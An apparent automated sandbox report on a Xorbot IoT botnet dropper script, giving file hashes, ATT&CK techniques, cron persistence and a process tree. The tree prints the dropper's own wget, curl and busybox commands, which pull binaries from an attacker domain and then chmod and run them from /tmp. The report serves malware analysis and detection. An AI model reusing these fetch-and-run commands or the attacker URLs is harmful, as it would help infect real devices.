xorbot | 94a11ddc23e1ff0bdccae8d3ad1bd3b9b1f55673f65d1647714695984b1281b1

Analysis

max time kernel
123s
max time network
152s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
21-02-2025 04:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

3f3a9db2b6aa795d2e387871e5802a48
SHA1

eb7cecee16a507e065aac9105801a18973554e0c
SHA256

94a11ddc23e1ff0bdccae8d3ad1bd3b9b1f55673f65d1647714695984b1281b1
SHA512

68f5fa7d816718ab2ccae4993f932827acccfb17ec9717fed1b7eb481c811d05414a9bf171e3691558eae6662ce2d61535935f654d82f4383571ebd9db84081a
SSDEEP

192:XpMMGuGWGdGEGoGkLpBKyEKtGuGWGdGEGoGcb:XK35hkvbkLpBKJ5hkvbcb

Score

10^/10

xorbot botnet defense_evasion discovery execution persistence privilege_escalation trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral4/files/fstream-6.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Contacts a large (1709) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
794	chmod
920	chmod
930	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY	795	bins.sh
/tmp/pNBd7bf1BlXic2JvWtVC1rCLWDoVTNlJg6	931	bins.sh

Renames itself 1 IoCs

pid	Process
796	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalation

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.elXkaj	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/17/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/867/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1023/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/332/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/825/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1052/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1109/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/989/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1070/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1126/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/69/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/924/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/893/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/942/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/963/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/967/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/992/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1083/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1114/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1118/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1120/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1195/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1206/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1207/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/72/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/126/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/850/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1228/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/8/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/830/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1097/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/383/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/852/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1001/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1188/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1223/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/9/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1217/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/708/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/842/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/868/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1194/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1215/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/854/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/900/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1000/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1043/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1056/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/831/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/859/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/870/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/872/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1142/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/13/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/824/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/871/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/816/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/974/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/11/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/18/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/876/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/911/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/964/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
File opened for reading	/proc/1050/cmdline	iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY

System Network Configuration Discovery 1 TTPs 9 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
750	curl
793	busybox
897	curl
903	busybox
926	wget
724	wget
869	wget
927	curl
929	busybox

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY	wget
File opened for modification	/tmp/iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY	curl
File opened for modification	/tmp/pNBd7bf1BlXic2JvWtVC1rCLWDoVTNlJg6	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
- Executes dropped EXE
PID:716
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:719
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:724
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:750
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
  2⤵
  - System Network Configuration Discovery
  PID:793
- /bin/chmod
  chmod 777 iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
  2⤵
  - File and Directory Permissions Modification
  PID:794
- /tmp/iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
  ./iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
  2⤵
  - Renames itself
  - Reads runtime system information
  PID:795
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:797
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:798
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:799
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:800
- /bin/rm
  rm iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY
  2⤵
  PID:809
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/1FfKQ91nS2uj30KgfRWmSteEIUP39AG9MC
  2⤵
  - System Network Configuration Discovery
  PID:869
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/1FfKQ91nS2uj30KgfRWmSteEIUP39AG9MC
  2⤵
  - System Network Configuration Discovery
  PID:897
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/1FfKQ91nS2uj30KgfRWmSteEIUP39AG9MC
  2⤵
  - System Network Configuration Discovery
  PID:903
- /bin/chmod
  chmod 777 1FfKQ91nS2uj30KgfRWmSteEIUP39AG9MC
  2⤵
  - File and Directory Permissions Modification
  PID:920
- /tmp/1FfKQ91nS2uj30KgfRWmSteEIUP39AG9MC
  ./1FfKQ91nS2uj30KgfRWmSteEIUP39AG9MC
  2⤵
  PID:922
- /bin/rm
  rm 1FfKQ91nS2uj30KgfRWmSteEIUP39AG9MC
  2⤵
  PID:924
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/pNBd7bf1BlXic2JvWtVC1rCLWDoVTNlJg6
  2⤵
  - System Network Configuration Discovery
  PID:926
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/pNBd7bf1BlXic2JvWtVC1rCLWDoVTNlJg6
  2⤵
  - System Network Configuration Discovery
  PID:927
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/pNBd7bf1BlXic2JvWtVC1rCLWDoVTNlJg6
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:929
- /bin/chmod
  chmod 777 pNBd7bf1BlXic2JvWtVC1rCLWDoVTNlJg6
  2⤵
  - File and Directory Permissions Modification
  PID:930
- /tmp/pNBd7bf1BlXic2JvWtVC1rCLWDoVTNlJg6
  ./pNBd7bf1BlXic2JvWtVC1rCLWDoVTNlJg6
  2⤵
  PID:931
- /bin/rm
  rm pNBd7bf1BlXic2JvWtVC1rCLWDoVTNlJg6
  2⤵
  PID:933
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/nBguOdUoIaOt55bKBScDaOBPYJr8ScmkC0
  2⤵
  PID:934

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/iMMKLVt95yRIAgrTk9DZD7wzoVa0TrkwgY

Filesize
151KB

MD5
6c583043d91c55aa470c08c87058e917

SHA1
abf65a5b9bba69980278ad09356e53de8bb89439

SHA256
2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

SHA512
82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Download Submit
/tmp/pNBd7bf1BlXic2JvWtVC1rCLWDoVTNlJg6

Filesize
122KB

MD5
cd3d4b9c643e5b473fb4d88ed05f0716

SHA1
64ee7a97418583d759eaea8000890cc3bae1b5f4

SHA256
0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

SHA512
164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

Download Submit
/var/spool/cron/crontabs/tmp.elXkaj

Filesize
210B

MD5
25c4ac7854b73467697680fe2d1e7132

SHA1
5900cabc90e0c77cb761e618a95ffc4fafdb4ba6

SHA256
04439c716d0638c1c9036612b450ae722a6a5d9dacb2ec056ba1887b588bb020

SHA512
08297150d29d42a71e137285c8a852e65003abeff5f1a3ed879140a68f31874e8b31c1bea9930e87616e147bdf02f7175099110dfbd703177ae18c116e3775b8

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads